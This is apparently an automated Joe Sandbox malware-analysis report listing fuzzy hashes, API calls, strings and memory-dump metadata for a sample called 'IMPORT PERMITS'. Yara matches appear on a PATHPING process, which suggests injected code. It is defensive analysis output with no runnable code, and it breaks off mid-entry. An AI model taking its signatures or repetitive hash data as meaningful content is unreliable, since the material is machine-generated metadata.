                                                                                                                                • Opcode Fuzzy Hash: 9b01646c5b665e211ad6538158a5c947abd93f621d87ebf3d432f2d4c4014b94
                                                                                                                                • Instruction Fuzzy Hash: C590022130140103D140715854186068015E7F5301F55D112F0418555CDA2589576322
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b00533a580defcde192c8ecd1631db5cf5aa079b94659423d3d4c5208ec1394b
                                                                                                                                • Instruction ID: a7af27706ca34f0c36aaa6ad9b77bbbb93195716eb37edaf9cae38945cdf3edd
                                                                                                                                • Opcode Fuzzy Hash: b00533a580defcde192c8ecd1631db5cf5aa079b94659423d3d4c5208ec1394b
                                                                                                                                • Instruction Fuzzy Hash: 10900221242442525545B15844045078016A7F4241795C113B1418951CC6369957E721
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2144c8a4df175c9004439570d9154c00ff21c57d996926025ffe6d3e1baf146c
                                                                                                                                • Instruction ID: 5754934900cedc0c8d4ffb80dbf2ac2bc831ab2e298b5336171cc2a87e148ee2
                                                                                                                                • Opcode Fuzzy Hash: 2144c8a4df175c9004439570d9154c00ff21c57d996926025ffe6d3e1baf146c
                                                                                                                                • Instruction Fuzzy Hash: 2590023124140502D141715844046064019A7E4241F95C113B0428555EC7658B57BB61
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5cb18bfe1aaaf106c8384fae40a5e5c384125e7b47ff5713ba7182355f060885
                                                                                                                                • Instruction ID: 57e4e0cb73980b2a62cda613dddb0950caed1914b0516f126490acaabcc7615d
                                                                                                                                • Opcode Fuzzy Hash: 5cb18bfe1aaaf106c8384fae40a5e5c384125e7b47ff5713ba7182355f060885
                                                                                                                                • Instruction Fuzzy Hash: 9590023120140942D10071584404B46401597F4301F55C117B0128655DC725C9527621
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0aa3a1111b8f87e776a8be963696618dbcb66972c8d0be9bf6a1c970a77b8ab6
                                                                                                                                • Instruction ID: b7d177fb80ad9f0cce620e4d2c7afdf9b4ed8dafc4caa90f0296daa2b775bec0
                                                                                                                                • Opcode Fuzzy Hash: 0aa3a1111b8f87e776a8be963696618dbcb66972c8d0be9bf6a1c970a77b8ab6
                                                                                                                                • Instruction Fuzzy Hash: 4E90023520140502D51071585804646405697E4301F55D512B0428559DC76489A2B221
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e609000879f14c1d875a8ba344880db99ee9ed3e9ad897fc98caf8af794755d0
                                                                                                                                • Instruction ID: 8151441d0d5afaad8e7c87d694ca9d6167130c5449e87cf0441e26282bb81bb7
                                                                                                                                • Opcode Fuzzy Hash: e609000879f14c1d875a8ba344880db99ee9ed3e9ad897fc98caf8af794755d0
                                                                                                                                • Instruction Fuzzy Hash: 0990023120240242954072585804A4E811597F5302B95D516B0019555CCA2489626321
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                • Instruction ID: 979be13648effb931f065e19da141a5d03dbee761b8e7a568487bec3bf28b0a2
                                                                                                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                Strings
                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014546FC
                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01454742
                                                                                                                                • Execute=1, xrefs: 01454713
                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01454787
                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01454655
                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01454725
                                                                                                                                • ExecuteOptions, xrefs: 014546A0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                • API String ID: 0-484625025
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __aulldvrm
                                                                                                                                • String ID: +$-$0$0
                                                                                                                                • API String ID: 1302938615-699404926
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: %%%u$[$]:%u
                                                                                                                                • API String ID: 48624451-2819853543
                                                                                                                                Strings
                                                                                                                                • RTL: Re-Waiting, xrefs: 0145031E
                                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014502E7
                                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014502BD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                • API String ID: 0-2474120054
                                                                                                                                Strings
                                                                                                                                • RTL: Re-Waiting, xrefs: 01457BAC
                                                                                                                                • RTL: Resource at %p, xrefs: 01457B8E
                                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01457B7F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                • API String ID: 0-871070163
                                                                                                                                APIs
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0145728C
                                                                                                                                Strings
                                                                                                                                • RTL: Re-Waiting, xrefs: 014572C1
                                                                                                                                • RTL: Resource at %p, xrefs: 014572A3
                                                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01457294
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                • API String ID: 885266447-605551621
                                                                                                                                • Opcode ID: 861e3b1bfda604aac3435d225d7b3c84582cee0418e2fa1f011e7b6222065e21
                                                                                                                                • Instruction ID: ca3ebb3c647a6a9d02252877bf61e769ea36804eec73d08108d3bde2a832e3f5
                                                                                                                                • Opcode Fuzzy Hash: 861e3b1bfda604aac3435d225d7b3c84582cee0418e2fa1f011e7b6222065e21
                                                                                                                                • Instruction Fuzzy Hash: 9B41E131740202ABC720CF2ACC41B6AB7A5FBA4755F10462EFD55EB761DB31E8468BD1
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: %%%u$]:%u
                                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                                • Opcode ID: 668beb27cf55fd061ba03145bb6718f2c450fb942acca00be84e945fb2642748
                                                                                                                                • Instruction ID: 1a74f6beacafb2a4ceceb9b51eeb09fea572b3b54a610d5cf32c17e022442fe0
                                                                                                                                • Opcode Fuzzy Hash: 668beb27cf55fd061ba03145bb6718f2c450fb942acca00be84e945fb2642748
                                                                                                                                • Instruction Fuzzy Hash: 2E315772A00119AFDF60DE3DDC40FEF7BF8EB54610F44455AE949E3250EB709A458BA0
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __aulldvrm
                                                                                                                                • String ID: +$-
                                                                                                                                • API String ID: 1302938615-2137968064
                                                                                                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                • Instruction ID: ca0aa5647f3562ae376bd7238e33250a16291b3a5f8b0be8323070905b6691c4
                                                                                                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                • Instruction Fuzzy Hash: D691C570E042369BDB24CF6DC891ABFBBA1AF64322F95451BE955E73E0D73089C18721
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $$@
                                                                                                                                • API String ID: 0-1194432280
                                                                                                                                • Opcode ID: dddc6f0145fe4c0e6ccd5abab36da600661536835c26219a9d906b92f3cd8355
                                                                                                                                • Instruction ID: 6c4d236ee55dfcc3232aafd40b56e93a5c682e715b5c0407d8a43595434a24b4
                                                                                                                                • Opcode Fuzzy Hash: dddc6f0145fe4c0e6ccd5abab36da600661536835c26219a9d906b92f3cd8355
                                                                                                                                • Instruction Fuzzy Hash: 1D812A71D002699BDB31CB54DC44BEEB7B8AB08754F0041EAEA1DB7290D7709E84CFA0

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:2.5%
                                                                                                                                Dynamic/Decrypted Code Coverage:4.1%
                                                                                                                                Signature Coverage:1.5%
                                                                                                                                Total number of Nodes:461
                                                                                                                                Total number of Limit Nodes:75

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: "$#$,$.$5 $61$@@$F$N$O$T$U$p$pr$q$s$xQ$|NF$#$'$S
                                                                                                                                • API String ID: 0-3021803578
                                                                                                                                • Opcode ID: 3ded67822e79fecda64eda7d8636d3c5dad77186ac3009fa3e94b0e534046ad3
                                                                                                                                • Instruction ID: 73faa62f29a10e56dace45e1dff4225ed1ec05a634f06d06a51dfbbb11009f6d
                                                                                                                                • Opcode Fuzzy Hash: 3ded67822e79fecda64eda7d8636d3c5dad77186ac3009fa3e94b0e534046ad3
                                                                                                                                • Instruction Fuzzy Hash: 9602B1B0D04319CBDB24CF95C894BDDBBB5BB44308F2081AAC4197B381C7796A99DF46
                                                                                                                                APIs
                                                                                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 0041C244
                                                                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 0041C27F
                                                                                                                                • FindClose.KERNELBASE(?), ref: 0041C28A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3541575487-0
                                                                                                                                • Opcode ID: f574dcca9fe591d4dd08330b55f3ca42781a6a5cf25310e43f55454e88115543
                                                                                                                                • Instruction ID: 2ef897b2c94aef3d03006893bbacc55d665ca5770ac4c45b173264ecf04486b2
                                                                                                                                • Opcode Fuzzy Hash: f574dcca9fe591d4dd08330b55f3ca42781a6a5cf25310e43f55454e88115543
                                                                                                                                • Instruction Fuzzy Hash: 2731A371A403187BDB20DFA1CC85FFF77BCDB84704F14449EB508A6191EA74AA848BA5
                                                                                                                                APIs
                                                                                                                                • NtCreateFile.NTDLL(?,?,?,5D33299C,?,?,?,?,?,?,?), ref: 00428CFE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 823142352-0
                                                                                                                                • Opcode ID: 3a538545ac33b4e89461af44c7dd5fa6b640ccf2d02e9bd38c0d6b0058846378
                                                                                                                                • Instruction ID: 94e7981f0094d1299fbff6a41f57b178f1e13be7550df70abf6f4d8b04326c4c
                                                                                                                                • Opcode Fuzzy Hash: 3a538545ac33b4e89461af44c7dd5fa6b640ccf2d02e9bd38c0d6b0058846378
                                                                                                                                • Instruction Fuzzy Hash: 5031EAB5A00248AFCB14DF99D881EDF77B9EF8C314F508119F918A7345D734A851CBA5
                                                                                                                                APIs
                                                                                                                                • NtReadFile.NTDLL(?,?,?,5D33299C,?,?,?,?,?), ref: 00428E59
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FileRead
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                • Opcode ID: 3f8db6c77631d86ce37d9d3fe5275efd892d8e28885a73c69f0e239a369adcbe
                                                                                                                                • Instruction ID: 61301c75e98bc4aa872931dba7bd98f3143852991792396e46ca187b41b132b9
                                                                                                                                • Opcode Fuzzy Hash: 3f8db6c77631d86ce37d9d3fe5275efd892d8e28885a73c69f0e239a369adcbe
                                                                                                                                • Instruction Fuzzy Hash: F331EA75A00208AFDB14DF99D881EEFB7B9EF8C714F50821AF918A7341D734A811CBA5
                                                                                                                                APIs
                                                                                                                                • NtAllocateVirtualMemory.NTDLL(0041199B,?,00427B1F,5D33299C,00000004,00003000,?,?,?,?,?,00427B1F,0041199B,?,?,0042AFA1), ref: 0042915B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                • Opcode ID: 1409185346ce7a013563e4669413ced259aff9e196a2489ade36b6e6bc90393b
                                                                                                                                • Instruction ID: fcfac83777d1bd894e9302dfe60120c0194716a6880ea0b1e168e6ce1e449545
                                                                                                                                • Opcode Fuzzy Hash: 1409185346ce7a013563e4669413ced259aff9e196a2489ade36b6e6bc90393b
                                                                                                                                • Instruction Fuzzy Hash: 67214DB5A00249AFDB10DF99DC81EEFB7B9EF88714F40411AFD18A7241D774A811CBA5
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: DeleteFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                • Opcode ID: 70c51c4d1c49d97d4bd7d0c6d274920f4979941384b9263865c7b785f2aa4232
                                                                                                                                • Instruction ID: 0f79bc1409fe2a4ad032c72e08d2c23460c36f040aac989cd39c3b6e6aafd436
                                                                                                                                • Opcode Fuzzy Hash: 70c51c4d1c49d97d4bd7d0c6d274920f4979941384b9263865c7b785f2aa4232
                                                                                                                                • Instruction Fuzzy Hash: B311C171A00218BFD610EB65DC42FABB7ACDF89324F80810EF918A7281D7746511C7E6
                                                                                                                                APIs
                                                                                                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00428F57
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Close
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                • Opcode ID: c327015965e002ba6da806d7b35ba06a045db85dc36153716a3361cbcbb9684d
                                                                                                                                • Instruction ID: cf6a14b6523e47bbd27b9471d6e22a3bd109654453a7a865f20d04c6673a03f9
                                                                                                                                • Opcode Fuzzy Hash: c327015965e002ba6da806d7b35ba06a045db85dc36153716a3361cbcbb9684d
                                                                                                                                • Instruction Fuzzy Hash: 03E046362102147BD620EA5ADC01F9B77ACEBC6724F81841AFA09A7242C674B91287B5
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 026cef33afc1e512a91f8f0dc408ab999e541793e25e789f4258ac13e575d0c0
                                                                                                                                • Instruction ID: 8b7ef71cf5253f28b3e0dd8a147b30efa105e30620261ddc42f0b1003eb94813
                                                                                                                                • Opcode Fuzzy Hash: 026cef33afc1e512a91f8f0dc408ab999e541793e25e789f4258ac13e575d0c0
                                                                                                                                • Instruction Fuzzy Hash: 9E90023160981012924071584885547400597F0305B55C011E0428674C8E148E5A6371
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: aa9c6365d8b04b1606781b1e98ee14281aa94f59c708fb8cfe66376e6137e402
                                                                                                                                • Instruction ID: b66b2122ccc7b73f42794a90594332cfe0f7869d71cfaef6ab2ef30013c05797
                                                                                                                                • Opcode Fuzzy Hash: aa9c6365d8b04b1606781b1e98ee14281aa94f59c708fb8cfe66376e6137e402
                                                                                                                                • Instruction Fuzzy Hash: 1E90026160551042424071584805407600597F1305395C115A0558670C8A188D59A279
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 4753a102461e32f3b66cda374442a2986f3349725e7330b0454b2fec366a8b34
                                                                                                                                • Instruction ID: 302970f2e9052445ed2860a452f3ac52bfebf74dfd33a3d0b087adcd2f11fe28
                                                                                                                                • Opcode Fuzzy Hash: 4753a102461e32f3b66cda374442a2986f3349725e7330b0454b2fec366a8b34
                                                                                                                                • Instruction Fuzzy Hash: F1900225215410030205B5580705507004687E5355355C021F1019670CDA218D656131
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: b62e71b55def450d70027cf44f149703c56434870ce9f126c09c01d30592d5cf
                                                                                                                                • Instruction ID: 9dd7aedb8d2c30f41d135fe8bcd1d4279500bac2bb1116cdc3b9018ca776eabb
                                                                                                                                • Opcode Fuzzy Hash: b62e71b55def450d70027cf44f149703c56434870ce9f126c09c01d30592d5cf
                                                                                                                                • Instruction Fuzzy Hash: 25900225225410020245B558060550B044597E6355395C015F141A6B0CCA218D696331
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
